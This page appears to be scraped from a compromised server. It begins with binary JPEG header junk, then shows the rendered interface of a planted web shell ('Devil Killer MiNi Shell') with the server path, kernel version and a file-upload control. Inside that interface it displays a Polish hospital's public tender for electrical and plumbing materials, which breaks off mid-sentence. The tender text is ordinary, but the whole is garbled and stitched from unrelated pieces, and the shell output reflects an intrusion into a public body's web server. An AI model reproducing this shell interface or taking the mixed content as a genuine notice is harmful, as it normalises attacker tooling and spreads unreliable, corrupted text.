JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240613/0036553201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> MATERIAŁY ELEKTRYCZNE, HYDRAULICZNE, ŚLUSARSKIE I REMONTOWO BUDOWLANE </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KUTNOWSKI SZPITAL SAMORZĄDOWY SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 100974785</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kościuszki 52</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kutno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">99-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL715 - Skierniewicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 24 3880202</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">nzoz.kss@szpital.kutno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szpital.kutno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> MATERIAŁY ELEKTRYCZNE, HYDRAULICZNE, ŚLUSARSKIE I REMONTOWO BUDOWLANE </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1e72dcfb-28aa-11ef-a458-c2a7c3d67e03</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00365532</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> : https://platformazakupowa.pl/transakcja/939976 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/939976</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim, przy użyciu środków komunikacji elektronicznej za pośrednictwem platformazakupowa.pl (zwanej dalej jako<br/>„Platforma”) pod adresem: : https://platformazakupowa.pl/transakcja/939976<br/>2. Korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>3. Komunikacja w postępowaniu między Zamawiającym a Wykonawcami, w tym składanie ofert, oświadczeń, wniosków, zawiadomień oraz informacji, odbywa się za pośrednictwem Platformy i formularza „Wyślij wiadomość do Zamawiającego”.<br/>4. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem Platformy poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że<br/>wiadomość została wysłana do Zamawiającego.<br/>5. Zamawiający będzie przekazywał Wykonawcom informacje za pośrednictwem Platformy Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana za pośrednictwem Platformy do konkretnego Wykonawcy.<br/>6. Wykonawca ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na Platformie przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>7. Zamawiający, zgodnie z § 11 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie zamieszcza wymagania dotyczące specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za pośrednictwem<br/>Platformy, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) Platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>7) Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>8. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1) akceptuje warunki korzystania z Platformy określone w Regulaminie zamieszczonym na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/1-regulamin oraz uznaje go za wiążący,<br/>2) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod adresem: https://platformazakupowa.pl/strona/45-<br/>instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz.Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez Wykonawcę będą<br/>przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.<br/>2. Zamawiający informuje, że:<br/>1) administratorem danych osobowych Wykonawcy jest „Kutnowski Szpital Samorządowy” Spółka z o.o., reprezentowany przez<br/>Prezesa Zarządu, tel. 24 3880 200, adres e-mail: nzoz.kss@szpital.kutno.pl<br/>2) w sprawach związanych z przetwarzaniem danych osobowych, można kontaktować się z Inspektorem Ochrony Danych, za<br/>pośrednictwem adresu e-mail: iod@szpital.kutno.pl<br/>3) dane osobowe Wykonawcy będą przetwarzane w celu przeprowadzenia postępowania o udzielenie zamówienia publicznego pn.;MATERIAŁY ELEKTRYCZNE, HYDRAULICZNE, ŚLUSARSKIE I REMONTOWO – BUDOWLANE , Nr postępowania: ZP/16/24 oraz w celu archiwizacji dokumentacji dotyczącej tego postępowania;<br/>4) odbiorcami przekazanych przez Wykonawcę danych osobowych będą osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy Pzp;<br/>5) dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata,<br/>okres przechowywania obejmuje cały okres obowiązywania umowy.<br/>3. Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do wypełnienia wszystkich obowiązków formalno-prawnych wymaganych przez RODO i związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia.<br/>Do obowiązków tych należą:<br/>1) obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te Wykonawca bezpośrednio pozyskał i przekazał Zamawiającemu w treści oferty lub dokumentów składanych na<br/>żądanie Zamawiającego;<br/>2) obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane Wykonawca pozyskał w sposób pośredni, a które to dane Wykonawca przekazuje Zamawiającemu w treści oferty lub dokumentów składanych na żądanie<br/>Zamawiającego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje, że;<br/>1) udostępnia dane osobowe, o których mowa w art. 10 RODO (dane osobowe dotyczące wyroków skazujących i czynów zabronionych) w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp, do upływu terminu na ich wniesienie;<br/>2) udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1 RODO (tj. danych osobowych ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne,<br/>przekonania religijne lub światopoglądowe, przynależność do związków zawodowych oraz przetwarzania danych genetycznych, danych biometrycznych w celu jednoznacznego zidentyfikowania osoby fizycznej lub danych dotyczących zdrowia, seksualności lub orientacji seksualnej tej osoby), zebranych w toku postępowania o udzielenie zamówienia;<br/>3) w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez Zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO (związanych z prawem Wykonawcy do uzyskania od administratora potwierdzenia, czy przetwarzane są dane osobowe jego dotyczące, prawem Wykonawcy do bycia poinformowanym o odpowiednich zabezpieczeniach, o których mowa w art. 46 RODO, związanych z przekazaniem jego danych osobowych do państwa trzeciego lub organizacji<br/>międzynarodowej oraz prawem otrzymania przez Wykonawcę od administratora kopii danych osobowych podlegających przetwarzaniu), Zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu<br/>sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia;<br/>4) skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia, o którym mowa w art. 16 RODO (uprawnienie do sprostowania lub uzupełnienia danych osobowych), nie może naruszać integralności protokołu postępowania oraz jego załączników;<br/>5) w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania;<br/>6) w przypadku, gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia<br/>postępowania o udzielenie zamówienia Zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w<br/>art. 18 ust. 2 rozporządzenia 2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/16/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET NR I - MATERIAŁY ELEKTRYCZNE <br/>1.	Bezpiecznik B16	- Szt. 20<br/>2.	Bezpiecznik B20	- Szt . 25<br/>3.	Bezpiecznik B25	- Szt. 25<br/>4.	Elektrozaczep EZ-4009 - Szt. 10<br/>5.	F/UTP 4x2x23 - Szt. 900<br/>6.	Gniazdo komputerowe podwójne 2xRJ45 białe	- Szt. 10<br/>7.	Gniazdo podwójne z uziemieniem białe natynkowe	- Szt. 150<br/>8.	Gniazdo podwójne z uziemieniem białe podtynkowe IP44	- Szt. 200<br/>9.	Gniazdo poj. z uziemieniem IP44 białe	- Szt. 500<br/>10.	Gniazdo telefoniczne pojedyncze	- Szt. 45<br/>11.	Izolacja - Szt. 100<br/>12.	Kasownik K-120-20 - Szt. 11<br/>13.	Kasownik p/t on/off 24V	- Szt. 6<br/>14.	Korytko 25x15	- Mb 100<br/>15.	Kostka halogenowa GU-10	- Szt. 160<br/>16.	Lampa sygnalizacyjna n/t	- Szt. 20<br/>17.	Łącznik do lampki	- Szt. 150<br/>18.	Nasuwka N6.3-2.5 żeńska	- Szt. 150<br/>19.	Obudowa rozdzielni 12	- Szt. 1<br/>20.	Opaska &#34;trytytka&#34;(różne długości)	- Szt. 500<br/>21.	Oprawa 1x120cm hermetyka	- Szt. 30<br/>22.	Oprawa 2x120 pusta	- Szt. 70<br/>23.	Oprawa do świetlówki G13	- Szt. 500<br/>24.	Oprawa E-27	- Szt. 65<br/>25.	Oprawa ewa-aw, 1W, 3h, n/t- Szt .8<br/>26.	Oprawa ewa-aw, 1W, 3h, p/t	- Szt. 3<br/>27.	Oprawka metalowa E-27 bez kołnierza	- Szt. 65<br/>28.	Oprawka remontowa z przewodem	- Szt. 50<br/>29.	Panel LED 40W 400K 3200Im 60x60	- Szt. 60<br/>30.	Przedłużacz 5 gniazdkowy 3m	- Szt. 20<br/>31.	Przedłużacz 5 gniazdkowy 5m	- Szt. 20<br/>32.	Przedwód H05w-f OW 3x1,5	- m. 50<br/>33.	Przewód alarmowy YTDY 6x0,5	- m. 350<br/>34.	Przewód instalacyjny 40x40	- m. 150<br/>35.	Przewód instalacyjny DY 0,5 biały	- m. 20<br/>36.	Przewód instalacyjny OWY 5x0,75- m. 50<br/>37.	Przewód instalacyjny YDYp 5x2,5	- m. 16<br/>38.	Przewód LGY 16cm2 - 10 mb	- Szt.18<br/>39.	Przewód OMY 4x0,75	- m. 80<br/>40.	Przewód płaski YDYp 3x2,5 750V	- m. 300<br/>41.	Przewód YDY 3x1,5 750V	- m 1000<br/>42.	Przewód YDY 3X4 750V	- mb 200<br/>43.	Puszka do nidy z wkrętem	- Szt. 45<br/>44.	Puszka instalacyjna ze złączką	- szt .30<br/>45.	Puszka natynkowa biała pojedyncza	-szt. 60<br/>46.	Puszka podtynkowa	- szt. 40<br/>47.	Puszka potrójna głęboka	- szt. 40<br/>48.	Ramka pojedyncza biała	- szt. 120<br/>49.	Szybkozłączka transparentna 5x0,2-4mm	- szt. 300<br/>50.	Szybkozłączka WAGO	- szt. 300<br/>51.	Szybkozłączka WAGO 2	- szt. 300<br/>52.	Szybkozłączka WAGO 3	- szt. 300<br/>53.	Świeczka 4W E-27 zimna	- szt. 50<br/>54.	Świeczka e14 4w ciepła	- szt 50<br/>55.	świeczka e14 6w ciepła	- szt.5 0<br/>56.	Świeczka e14 8W neutralna	-szt. 60<br/>57.	Świetlówka 16W zimna	- Szt. 40<br/>58.	Świetlówka 18W	- szt. 170<br/>59.	Świetlówka 18W neutralna	- szt. 220<br/>60.	Świetlówka 36W	- szt. 220<br/>61.	Świetlówka 8W	- szt. 30<br/>62.	Świetlówka 9W neutralna	- szt. 140<br/>63.	Świetlówka LED 18W neutralna	- szt. 15<br/>64.	Wkładka topikowa 10A	- Szt. 300<br/>65.	Wkładka topikowa 16A	- Szt. 600<br/>66.	Wkładka topikowa 20A	- Szt. 300<br/>67.	Włącznik pociągany do WC	- Szt. 10<br/>68.	Wtyczka kątowa z uziemieniem	- Szt. 50<br/>69.	Wyłącznik podwójny biały podtynkowy	- Szt .50<br/>70.	Wyłącznik pojedynczy biały podtynkowy	- Szt. 200<br/>71.	Wyłącznik rózn-prąd 40A/30mA - Szt . 4<br/>72.	Wyłącznik różn-prąd 100/4 TS35	- Szt. 4<br/>73.	Wyłącznik schodowy biały podtynkowy	- Szt. 20<br/>74.	Wyświetlacz do pkt pilęgn.	- Szt. 1<br/>75.	Zapłonnik 4-22W	- Szt. 300<br/>76.	Zapłonnik 4-65W	- Szt. 300<br/>77.	Zapłonnik 4-80W	- Szt. 300<br/>78.	Zegar astronomiczny	- Szt .5<br/>79.	Żaróweczka do WOS 1W	- Szt. 13<br/>80.	Żarówka GLS E-27 10W	- Szt. 500<br/>81.	Żarówka GLS E-27 13W- Szt. 100<br/>82.	Żarówka GLS E-27 15W- Szt. 10<br/>83.	Żarówka GLS E-27 9W	- Szt. 400<br/>84.	Żarówka gu10 6W	- Szt. 100<br/>85.	Żarówka LED SMD 3 W GU10	- Szt. 100 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44190000-8 - Różne materiały budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Suma punktów uzyskanych za wszystkie kryteria, stanowić będzie końcową ocenę danej oferty.<br/>Ogólna ocena oferty = ocena oferty X + termin dostawy oferty X</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET NR II - MATERIAŁY HYDRAULICZNE<br/>1.	Umywalka 50 mocowana do ściany - szt. 10<br/>2.	Deska do sedesu - szt. 40<br/>3.	Bateria umywalkowa ścienna - szt. 16<br/>4.	Syfon umywalkowy - szt. 40<br/>5.	Wylewka górna 1/2 cala 150 mm - szt. 50<br/>6.	Głowica baterii - szt. 200<br/>7.	Zawór kątowy do spłuczki	- szt. 16<br/>8.	Wąż natryskowy 1700mm - szt. 40<br/>9.	Wkład do spłuczki- zawór spustowy - szt. 10<br/>10.	Zawór napełniający do spłuczki 1/2 cala - szt. 50<br/>11.	Zawór napełniający do spłuczki 3/8 cala - szt. 50<br/>12.	Pokrętło baterii - szt. 100<br/>13.	Redukcja gumowa 65/32- szt. 30<br/>14.	Redukcja gumowa 50/25 - szt.10<br/>15.	Zawór kulowy 50 - szt. 10<br/>16.	Zawór kulowy 40 - szt. 10<br/>17.	Zawór grzejnika 3/8 cala - szt.1 2<br/>18.	Rura kanalizacyjna PCV50x2m - szt. 10<br/>19.	Rura kanalizacyjna PCV50x1m - szt. 10<br/>20.	Rura kanalizacyjna 50x50 cm - szt. 10<br/>i inne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44190000-8 - Różne materiały budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Suma punktów uzyskanych za wszystkie kryteria, stanowić będzie końcową ocenę danej oferty.<br/>Ogólna ocena oferty = ocena oferty X + termin dostawy oferty X</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów 